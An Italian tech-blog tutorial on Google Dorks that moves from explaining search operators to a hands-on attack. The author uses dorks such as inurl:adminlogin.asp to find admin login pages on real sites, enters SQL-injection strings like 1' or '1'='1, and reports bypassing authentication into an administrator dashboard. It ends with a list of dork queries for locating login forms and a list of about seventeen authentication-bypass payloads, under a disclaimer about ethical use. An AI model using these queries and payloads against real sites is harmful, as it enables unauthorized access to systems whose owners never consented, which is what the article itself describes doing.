Cari lettori di Tecnogalaxy, oggi riprenderemo l’argomento delle Google Dorks già trattato in qualche articolo precedente. In questo articolo vi spiegherò in dettaglio cosa sono e come usarle a scopo di ricerca personale che per lavoro.

Secondo una ricerca si stima che Google abbia scaricato più pagine di un qualsiasi altro motore di ricerca; le statistiche parlano di oltre un miliardo di pagine con un tempo relativamente basso di esecuzione. Pazzesco se ci pensate.

Il popolare motore di ricerca californiano riesce a soddisfare tutte le ricerche, sia eseguite per fini didattici che per fini puramente di curiosità.

Google dorks, un potente strumento alla portata di tutti

Parlando in modo tecnico, le Google Dorks potremmo paragonarle a delle query specifiche che possiamo porre al famoso motore di ricerca per ottenere ciò che desideriamo.

l campo delle dorks è molto ampio, attraverso questo magnifico strumento potremo individuare in pochissimo tempo determinati file nel web come pdf, mp3, file contenente le password e così via.

Google Dorking o Google Hacking si intende l’insieme di tecniche di ricerca avanzate applicate a Google, come ad altri motori, utilizzabili  anche nell’ambito dell’OSINT utili per:

  1. Localizzare informazioni che le organizzazioni di qualsiasi tipo, pur non intenzionalmente, hanno reso pubblicamente disponibili;
  2. Rilevare vulnerabilità da utilizzare per successivi attacchi informatici;

Eseguendo specifiche ricerche, qualsiasi malintenzionato può far emergere informazioni quali username, password, liste di indirizzi e-mail, documenti “sensibili”, coordinate bancarie, vulnerabilità di siti web.

Il cuore di questa tecnica è proprio la stringa di caratteri che comprende operatori di ricerca avanzati (normalmente non utilizzati dall’utente “medio”) quali ad esempio:

  • site: filtra i risultatati restituendo solo i file o documenti situati in uno specifico sito o appartenenti ad un determinato dominio;
  • intitle: filtra i risultati restituendo solo le pagine che contengono una specifica frase nel titolo (ad esempio intitle:index.of mp3);
  • filetype:  seguito tipicamente da un’estensione (PDF, XLS, DOC, TIF) restituisce nei risultati solamente i file con l’estensione indicata;
  • intext: ricerca contenuti che includano una certa parola chiave, restringendo la ricerca al corpo della pagina ignorando tutto il resto;

Passiamo a degli esempi reali, eseguendo alcune Google Dorks (Ovviamente come già spiegato in articoli precedenti, le Google Dorks sono interfacciabili con il nostro caro amico Kali Linux).

Hackerare con le Google Dorks

Supponiamo di voler cercare le pagine di login dei siti fatti in asp, apriamo il nostro browser e rechiamoci su google , scriviamo la seguente query:

inurl:adminlogin.asp

Seleziono il primo url e accedo alla pagina di login del sito, faccio un test inserendo:

Come UserID:

admin

Come Password:

1' or '1'='1
Come sfruttare al meglio le Google Dorks

Cambio query, sempre in google scrivo:

inurl:\\admin/admin_login.php
Come sfruttare al meglio le Google Dorks

Seleziono un url e accedo alla pagina di login del sito, faccio un test inserendo:

Come UserID:

admin

Come Password:

1' or '1'='1

Oppure:

Come UserID:

1' or '1'='1

Come Password:

1' or '1'='1

Bingo, abbiamo bypassato la pagina di login e siamo nella dashboard come amministratore.

Ovviamente avendo scoperto una falla, avviso subito il webmaster spiegandogli la falla trovata e come sistemarla.

Utilizzo altre query ma il risultato non cambia….Questa una lista di query utilizzate per fare dei test.

Lista delle query

inurl:adminlogin.asp
inurl:admin_login.asp
inurl:adminlogon.asp
inurl:admin_logon.asp
inurl:\\admin/admin_login.php
inurl:/admin.asp
inurl:/login.asp
inurl:/logon.asp
inurl:/adminlogin.asp
inurl:/adminlogon.asp
inurl:/admin_login.asp
inurl:/admin_logon.asp
inurl:/admin/admin.asp
inurl:/admin/login.asp
inurl:/admin/logon.asp
inurl:/admin/adminlogin.asp
inurl:/admin/adminlogon.asp
inurl:/admin/admin_login.asp
inurl:/admin/admin_logon.asp
inurl:/administrator/admin.asp
inurl:/administrator/login.asp
inurl:/administrator/logon.asp
inurl:root/login.asp
inurl:admin/index.asp

Queste query ci daranno come risultato dei form dove poter fare login, inserendo UserID e Password.

Per testare se ci sono delle possibili vulnerabilità (sqlinjection) nel codice di programmazione (in pratica se il codice viene controllato e pulito), potremo utilizzare quanto segue:

Nel campo UserID, inseriremo admin o admin’–  mentre nel campo password:

1'or'1'='1
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a

Ovviamente cercate di utilizzare queste tecniche per aiutare e non per fare danni, (ragione e muoviti come un Etica hacker), ricordate che se usate per scopi malevoli potete essere perseguibili penalmente.

Come sempre fatene buon uso facendo dei test su vostri device / computer , farli su device/computer non vostri è illegale.

Al prossimo articolo.

N.B.: Non mi assumo nessuna responsabilità dell’uso che farete della guida, in quanto stilata per uso didattico e formativo.

Giorgio Perego

IT Manager

Leggi anche:

Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!

Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.

Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.

© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.